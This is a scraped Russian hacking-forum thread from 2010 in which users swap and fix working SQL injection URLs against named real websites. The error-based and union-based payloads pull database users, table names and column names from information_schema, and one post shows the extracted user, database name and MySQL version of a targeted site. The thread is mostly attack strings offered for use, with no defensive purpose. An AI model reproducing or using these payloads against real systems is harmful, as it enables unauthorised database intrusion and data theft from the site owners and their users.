Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
25.03.2010, 00:22
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
2 mailbrush:
Код:
http://www.vales.by/catalog.php?action=show_object&id=(select+1+from+(select+count(0),concat((select+user()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)
|
|
|
25.03.2010, 07:40
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
http://www.zed.ua/en/index.php?id=-1%20or%20(select%20count(*)from(select%201%20union %20select%202%20union%20select%203)x%20group%20by% 20concat(mid((select%20table_name%20from%20informa tion_schema.tables%20limit%2041,1),1,64),floor(ran d(0)*2)))--
а дальше как видеть колонки в таблице ua_menu_item1 ??
зделаю так
http://www.zed.ua/en/index.php?id=-1%20or%20(select%20count(*)from(select%201%20union %20select%202%20union%20select%203)x%20group%20by% 20concat(mid((select%20column_name%20from%20inform ation_schema.columns%20where%20table_name=0x75615F 6D656E755F6974656D31%20limit%202,1),1,64),floor(ra nd(0)*2)))--
не получаеться..помоqите поjaлуста
|
|
|
|
25.03.2010, 15:18
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Потому что ua_menu_item 1, - единица вставляется от условия для ошибки дублей. Да и вообще, зачем эта гора урла, когда можно просто..
Код:
http://www.zed.ua/en/index.php?id=1+or(1,1)=(select(count(0)),concat((select(column_name)from(information_schema.columns(where)table_name=0x75615f6d656e755f6974656d)limit+0,1),floor(rand(0)*2))from(information_schema.tables)GROUP+BY+2)
Последний раз редактировалось v1d0qz; 25.03.2010 в 15:25..
|
|
|
|
25.03.2010, 18:32
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Код:
http://diktatu.net/index.php?id=34&i_id=1625
Cкажите, это php-inj? |
|
|
|
25.03.2010, 18:46
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Сообщение от CyberHunter
Код:
http://diktatu.net/index.php?id=34&i_id=1625
Cкажите, это php-inj? нет..
Код:
http://diktatu.net/index.php?id=-1+union+select+1,2,%28select+concat%280x7e,0x27,group_concat%28table_name%29,0x27,0x7e%29+from+information_schema.tables+Where+table_schema=0x64696B74617430305F64696B74617475%29--
|
|
|
|
25.03.2010, 18:49
|
|
Участник форума
Регистрация: 09.11.2009
Сообщений: 265
Провел на форуме:
312907
Репутация:
18
|
|
На UcoZе есть XSS?
|
|
|
|
25.03.2010, 20:21
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
Сообщение от v1d0qz
Потому что ua_menu_item 1, - единица вставляется от условия для ошибки дублей. Да и вообще, зачем эта гора урла, когда можно просто..
Код:
http://www.zed.ua/en/index.php?id=1+or(1,1)=(select(count(0)),concat((select(column_name)from(information_schema.columns(where)table_name=0x75615f6d656e755f6974656d)limit+0,1),floor(rand(0)*2))from(information_schema.tables)GROUP+BY+2)
не получилось
|
|
|
|
25.03.2010, 21:12
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Код:
http://www.zed.ua/en/index.php?id=(select+1+from+(select+count(0),concat((select+column_name+from+information_schema.columns+where+table_name=0x75615f6d656e755f6974656d+limit+0,1),floor(rand(0)*2))+from+information_schema.columns+group+by+2+limit+0,1)a)
Последний раз редактировалось Pashkela; 25.03.2010 в 21:32..
|
|
|
|
25.03.2010, 22:07
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от Pashkela
2 mailbrush:
Код:
http://www.vales.by/catalog.php?action=show_object&id=(select+1+from+(select+count(0),concat((select+user()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)
http://www.vales.by/catalog.php?action=show_object&id=-1+union+select+unhex(hex(concat_ws(0x3a,user(),use r(),database(),version())))+--+
@localhost: valesby@localhost:valesby:5.0.90
|
|
|
|
25.03.2010, 22:19
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
2 Ctacok:
Ну тогда еще объясни плз нахрена вы всегда перед -- плюсик ставите, это что, магия какая-то особенная? ))
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2011663){kind=avatar}
Похожие темы
Линейный вид
